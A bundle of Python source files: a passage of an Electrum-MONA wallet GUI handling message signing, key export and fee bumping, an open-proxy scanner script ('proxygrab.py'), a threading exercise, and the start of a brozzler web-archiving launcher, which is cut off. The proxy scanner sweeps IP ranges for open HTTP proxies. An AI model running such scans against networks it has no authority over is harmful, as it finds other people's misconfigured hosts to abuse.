vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt) -> Optional[Transaction]:
from electrum_mona.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def read_tx_from_qrcode(self):
from electrum_mona import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("zcore:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum_mona import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-mona-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(repr(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.storage.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx: Transaction, new_tx: Transaction) -> None:
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
# new_tx.set_rbf(True)
new_tx.set_rbf(False)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
fee = self.wallet.get_tx_fee(txid)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New Fee rate') + ':'))
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate)
except CannotBumpFee as e:
self.show_error(str(e))
return
#if is_final:
# new_tx.set_rbf(True)
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
proxygrab.py |
import threading, requests, time, os, sys, random
class RangeIP_Generate(object):
def __init__(self):
self.r = '\033[31m'
self.g = '\033[32m'
self.y = '\033[33m'
self.b = '\033[34m'
self.m = '\033[35m'
self.c = '\033[36m'
self.w = '\033[37m'
self.rr = '\033[39m'
StartIP = raw_input(self.c + ' Start IP: ' + self.w)
ENDIP = raw_input(self.c + ' End IP: ' + self.w)
PRoxYPort = raw_input(self.c + ' Enter Proxy port [8080,80]: ' + self.w)
ip_range = self.Generate_IP(StartIP, ENDIP)
for ip in ip_range:
print(' ' + self.y + str(ip) + ':' + str(PRoxYPort))
with open('scanIps.txt', 'a') as xX:
xX.write(str(ip) + ':' + str(PRoxYPort) + '\n')
Main()
def Generate_IP(self, start_ip, end_ip): # Thanks --> cmikavac.net
Start = list(map(int, start_ip.split(".")))
end = list(map(int, end_ip.split(".")))
rec = Start
ip_range = []
ip_range.append(start_ip)
while rec != end:
Start[3] += 1
for i in (3, 2, 1):
if rec[i] == 256:
rec[i] = 0
rec[i - 1] += 1
ip_range.append(".".join(map(str, rec)))
return ip_range
class ScaNIP(object):
def __init__(self):
self.r = '\033[31m'
self.g = '\033[32m'
self.y = '\033[33m'
self.b = '\033[34m'
self.m = '\033[35m'
self.c = '\033[36m'
self.w = '\033[37m'
self.rr = '\033[39m'
IpList = raw_input(self.c + " Input IP List [ip:port]: " + self.w)
with open(IpList, 'r') as reader:
file = reader.read().splitlines()
thread = []
for x in file:
t = threading.Thread(target=self.CheckIP, args=(x, ''))
t.start()
thread.append(t)
time.sleep(0.05)
for j in thread:
j.join()
Main()
def CheckIP(self, Proxy, x):
try:
Got = requests.get('http://httpbin.org/html', proxies={'http': Proxy}, timeout=5)
if 'Herman Melville - Moby-Dick' in Got.text:
print(self.c + ' ' + str(Proxy) + ' ---> ' + self.g + str(Got.status_code))
with open('WorkHttpProxy.txt', 'a') as xX:
xX.write(Proxy + '\n')
except requests.Timeout:
print(self.c + ' ' + str(Proxy) + ' ---> ' + self.y + 'Timeout!')
except requests.ConnectionError:
print(self.c + ' ' + str(Proxy) + ' ---> ' + self.r + 'Dead IP!')
class Main():
def __init__(self):
self.gg = True
self.r = '\033[31m'
self.g = '\033[32m'
self.y = '\033[33m'
self.b = '\033[34m'
self.m = '\033[35m'
self.c = '\033[36m'
self.w = '\033[37m'
self.rr = '\033[39m'
self.cls()
self.print_logo()
self.PrintOptions()
while self.gg == True:
Chose = raw_input(str(' @> '))
if Chose == str(1):
self.cls()
self.print_logo()
RangeIP_Generate()
elif Chose == str(2):
self.cls()
self.print_logo()
ScaNIP()
elif Chose == str(99):
self.gg = False
sys.exit()
elif Chose == "help" or Chose == "Help" or Chose == "HELP":
self.PrintOptions()
elif Chose == "cls" or Chose == "clear":
self.cls()
self.print_logo()
self.PrintOptions()
else:
continue
def cls(self):
linux = 'clear'
windows = 'cls'
os.system([linux, windows][os.name == 'nt'])
def print_logo(self):
clear = "\x1b[0m"
colors = [36, 32, 34, 35, 31, 37]
x = """
_____ _____ _
| __ \ SadCode.org / ____| | |
| |__) | __ _____ ___ _| | __ _ __ __ _| |__
| ___/ '__/ _ \ \/ / | | | | |_ | '__/ _` | '_ \
| | | | | (_) > <| |_| | |__| | | | (_| | |_) |
|_| |_| \___/_/\_|\__, |\_____|_| \__,_|_.__/
__/ |
Coded By VanGans |___/ SadCode Official
"""
for N, line in enumerate(x.split("\n")):
sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
time.sleep(0.05)
def PrintOptions(self):
print(self.y + ' [1] ' + self.c + ' IP Range Generator')
print(self.y + ' [2] ' + self.c + ' Proxy Scanner')
print(self.y + ' [99]' + self.c + ' Exit')
Main()
|
num4.py | import threading
import time
import random
total = []
locking = threading.Lock()
def produce(cnt):
global total
while cnt>0:
locking.acquire()
total.append(random.randint(1,101))
locking.release()
cnt-=1
thread_A = threading.Thread(target=produce, args=(20,))
thread_B = threading.Thread(target=produce, args=(30,))
thread_A.start()
thread_B.start()
thread_A.join()
thread_B.join()
sum = 0
for num in total:
sum += num
print(sum, len(total)) |
easy.py | #!/usr/bin/env python
'''
brozzler-easy - brozzler-worker, warcprox, pywb, and brozzler-dashboard all
working together in a single process
Copyright (C) 2016 Internet Archive
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import sys
import logging
try:
import warcprox
import warcprox.main
import pywb
import brozzler.pywb
import wsgiref.simple_server
import wsgiref.handlers
import brozzler.dashboard
except ImportError as e:
logging.critical(
'%s: %s\n\nYou might need to run "pip install '
'brozzler[easy]".\nSee README.rst for more information.',
type(e).__name__, e)
sys.exit(1)
import argparse
import brozzler
import brozzler.cli
import os
import socket
import signal
import threading
import time
import doublethink
import traceback
import socketserver
def _build_arg_parser(argv=None):
argv = argv or sys.argv
arg_parser = argparse.ArgumentParser(
formatter_class=brozzler.cli.BetterArgumentDefaultsHelpFormatter,
prog=os.path.basename(argv[0]), description=(
'brozzler-easy - easy deployment of brozzler, with '
'brozzler-worker, warcprox, pywb, and brozzler-dashboard all '
'running in a single process'))
# common args
brozzler.cli.add_rethinkdb_options(arg_parser)
arg_parser.add_argument(
'-d', '--warcs-dir', dest='warcs_dir', default='./warcs',
help='where to write warcs')
# warcprox args
arg_parser.add_argument(
'-c', '--cacert', dest='cacert',
default='./%s-warcprox-ca.pem' % socket.gethostname(),
help=(
'warcprox CA certificate file; if file does not exist, it '
'will be created'))
arg_parser.add_argument(
'--certs-dir', dest='certs_dir',
default='./%s-warcprox-ca' % socket.gethostname(),
help='where warcprox will store and load generated certificates')
arg_parser.add_argument(
'--onion-tor-socks-proxy', dest='onion_tor_socks_proxy',
default=None, help=(
'host:port of tor socks proxy, used only to connect to '
'.onion sites'))
# brozzler-worker args
arg_parser.add_argument(
'-e', '--chrome-exe', dest='chrome_exe',
default=brozzler.cli.suggest_default_chrome_exe(),
help='executable to use to invoke chrome')
arg_parser.add_argument(
'-n', '--max-browsers', dest='max_browsers',
type=int, default=1, help=(
'max number of chrome instances simultaneously '
'browsing pages'))
# pywb args
arg_parser.add_argument(
'--pywb-address', dest='pywb_address',
default='0.0.0.0',
help='pywb wayback address to listen on')
arg_parser.add_argument(
'--pywb-port', dest='pywb_port', type=int,
default=8880, help='pywb wayback port')
# dashboard args
arg_parser.add_argument(
'--dashboard-address', dest='dashboard_address',
default='localhost',
help='brozzler dashboard address to listen on')
arg_parser.add_argument(
'--dashboard-port', dest='dashboard_port',
type=int, default=8881, help='brozzler dashboard port')
# common at the bottom args
brozzler.cli.add_common_options(arg_parser, argv)
return arg_parser
class ThreadingWSGIServer(
socketserver.ThreadingMixIn, wsgiref.simple_server.WSGIServer):
pass
class BrozzlerEasyController:
logger = logging.getLogger(__module__ + "." + __qualname__)
def __init__(self, args):
self.stop = threading.Event()
self.args = args
self.warcprox_controller = warcprox.main.init_controller(
self._warcprox_args(args))
self.brozzler_worker = self._init_brozzler_worker(args)
self.pywb_httpd = self._init_pywb(args)
self.dashboard_httpd = self._init_brozzler_dashboard(args)
def _init_brozzler_dashboard(self, args):
return wsgiref.simple_server.make_server(
args.dashboard_address, args.dashboard_port,
brozzler.dashboard.app, ThreadingWSGIServer)
def _init_brozzler_worker(self, args):
rr = doublethink.Rethinker(
args.rethinkdb_servers.split(","), args.rethinkdb_db)
frontier = brozzler.RethinkDbFrontier(rr)
service_registry = doublethink.ServiceRegistry(rr)
worker = brozzler.worker.BrozzlerWorker(
frontier, service_registry, chrome_exe=args.chrome_exe,
proxy='%s:%s' % self.warcprox_controller.proxy.server_address,
max_browsers=args.max_browsers)
return worker
def _init_pywb(self, args):
brozzler.pywb.TheGoodUrlCanonicalizer.replace_default_canonicalizer()
brozzler.pywb.TheGoodUrlCanonicalizer.monkey_patch_dsrules_init()
brozzler.pywb.support_in_progress_warcs()
brozzler.pywb.monkey_patch_wburl()
brozzler.pywb.monkey_patch_fuzzy_query()
brozzler.pywb.monkey_patch_calc_search_range()
if args.warcs_dir.endswith('/'):
warcs_dir = args.warcs_dir
else:
warcs_dir = args.warcs_dir + '/'
conf = {
'collections': {
'brozzler': {
'index_paths': brozzler.pywb.RethinkCDXSource(
servers=args.rethinkdb_servers.split(","),
